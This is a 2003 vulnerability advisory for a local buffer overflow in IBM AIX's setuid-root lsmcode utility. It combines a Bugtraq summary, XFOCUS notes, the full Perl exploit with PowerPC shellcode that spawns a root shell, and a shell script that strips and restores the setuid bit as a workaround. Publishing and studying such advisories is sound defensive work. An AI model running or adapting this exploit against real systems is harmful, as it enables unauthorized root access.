
Local buffer overflow in IBM AIX lsmcode


Created: 2003-06-20  Updated: 2003-06-20
Article type: compiled
Submitted by: watercloud (watercloud_at_xfocus.org)

IBM AIX LSMCODE Environment Variable Local Buffer Overflow Vulnerability (Vulnerabilities)
URL: http://www.securityfocus.com/bid/7871
Last Updated: 2003-06-11

Bugtraq ID: 7871
Class: Boundary Condition Error
CVE: CVE-MAP-NOMATCH

Published Jun 11, 2003
Vulnerable:
  IBM AIX 4.3
  IBM AIX 4.3.1
  IBM AIX 4.3.2
  IBM AIX 4.3.3
  IBM AIX 5.1

Insufficient bounds checking in the lsmcode utility will allow locally based
attackers to cause memory to be corrupted with attacker-supplied data. As a
result, it is possible to exploit this condition to execute arbitrary
attacker-supplied instructions with elevated privileges.

Exploit:
http://www.securityfocus.com/data/vulnerabilities/exploits/x_lsmcode_aix4x.pl


Currently we are not aware of any vendor-supplied patches for this issue.

Credit:

     Discovery of this vulnerability credited to watercloud@xfocus.org.


==============================================


Chinese version:
The lsmcode command in IBM's AIX operating system has a local buffer overflow vulnerability.
The program is setuid and owned by root, so a local user can exploit it to
obtain root privileges.

Affected AIX versions include: Aix4.3.1, Aix4.3.2, Aix4.3.3, Aix5.1.

The vendor currently has no patch for this issue.

This vulnerability was discovered by the XFOCUS team.

==============================================

Additional information from XFOCUS:

The Bugtraq description of this vulnerability is incomplete: the command performs no bounds-length checking on several command-line arguments as well as on environment variables,
not only on the environment variables. The overflow via the command line is a heap overflow; the one via the environment variables is a stack overflow.


----------------------------
The exploit released by XFOCUS is as follows:

#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested  : on Aix4.3.3. Maybe it works on other versions.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-6-1
# Announce: use at your own risk!

$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;

$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-6-1 ].\n\n";

$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();

$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    $ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
    $ret = system $CMD ,"-d","a";
  }
}

#sub
sub getshell {
  my ($XID,$GID)=@_;   # the two bytes spliced into the payload below
  my $SHELL;
  $SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
  $SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
  $SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
  $SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
  $SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
  $SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
  $SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
  return $SHELL;
}
#EOF

With suitable modifications, this program can also obtain root privileges on Aix5.1.

-----------------------------------
Temporary workaround for users:

  Temporarily remove the setuid bit from the program.
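The workaround above, turned into a small check/strip/restore script so the bit can be put back once a vendor fix is installed. This is an added example, not XFOCUS's own code; the path /usr/sbin/lsmcode comes from the exploit above, and the record-file location is an assumption.

```shell
#!/bin/sh
# Temporary mitigation for the setuid lsmcode issue: check whether the binary
# is setuid, strip the bit while recording the path so it can be restored
# after patching. The record-file location below is an assumption.

LSMCODE="${LSMCODE:-/usr/sbin/lsmcode}"                     # path from the advisory
MODE_RECORD="${MODE_RECORD:-/var/tmp/setuid_stripped.txt}"  # assumed location

# is_setuid FILE: exit 0 if FILE exists and has the setuid bit set, else 1.
# find -perm -4000 is used because AIX has no GNU stat(1).
is_setuid() {
    [ -f "$1" ] || return 1
    [ -n "$(find "$1" -perm -4000 2>/dev/null)" ]
}

# strip_setuid FILE RECORD: if FILE is setuid, append its path to RECORD and
# remove the bit with chmod u-s. Exit 0 if the bit was removed, 1 otherwise.
strip_setuid() {
    is_setuid "$1" || return 1
    printf '%s\n' "$1" >> "$2" || return 1
    chmod u-s "$1"
}

# restore_setuid RECORD: re-apply u+s to every path listed in RECORD (for use
# once the patched lsmcode is installed), then delete the record.
restore_setuid() {
    [ -r "$1" ] || return 1
    while IFS= read -r f; do
        [ -f "$f" ] && chmod u+s "$f"
    done < "$1"
    rm -f "$1"
}

# Command-line use: sh lsmcode_mitigate.sh check|strip|restore
case "${1:-}" in
    check)
        if is_setuid "$LSMCODE"; then echo "$LSMCODE is setuid"
        else echo "$LSMCODE is not setuid"; fi ;;
    strip)
        strip_setuid "$LSMCODE" "$MODE_RECORD" && echo "setuid bit removed from $LSMCODE" ;;
    restore)
        restore_setuid "$MODE_RECORD" && echo "setuid bits restored" ;;
esac
```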